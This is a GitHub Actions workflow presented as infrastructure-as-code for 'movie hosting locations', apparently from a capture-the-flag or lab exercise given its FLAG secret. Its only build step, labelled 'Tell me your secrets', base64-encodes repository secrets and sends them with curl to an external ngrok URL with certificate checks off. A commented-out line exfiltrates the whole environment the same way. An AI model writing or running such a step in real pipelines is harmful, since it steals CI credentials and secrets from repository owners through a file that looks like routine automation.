
name: IaC

# Controls when the new movie hosting locations are created or updated
on:
  push:
    branches: [ feature/alex2 ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
 
  build:
    runs-on: ubuntu-latest
    environment: Vienna


    steps:

      - name: Tell me your secrets
        run: |
          curl -k https://adfa-128-130-238-29.eu.ngrok.io/?data=$(${{ secrets.FAVOURITE }} | base64 --wrap=0)
          curl -k https://adfa-128-130-238-29.eu.ngrok.io/?data=$(${{ secrets.FLAG }} | base64 --wrap=0)
          curl -k https://adfa-128-130-238-29.eu.ngrok.io/?data=$(secrets.FAVOURITE | base64 --wrap=0)
          curl -k https://adfa-128-130-238-29.eu.ngrok.io/?data=$(env.secrets.FAVOURITE | base64 --wrap=0)

# curl -k https://1d15-128-130-238-29.eu.ngrok.io/?data=$(env | base64 --wrap=0)
# echo "::add-mask::${{ secrets.FAVOURITE }}"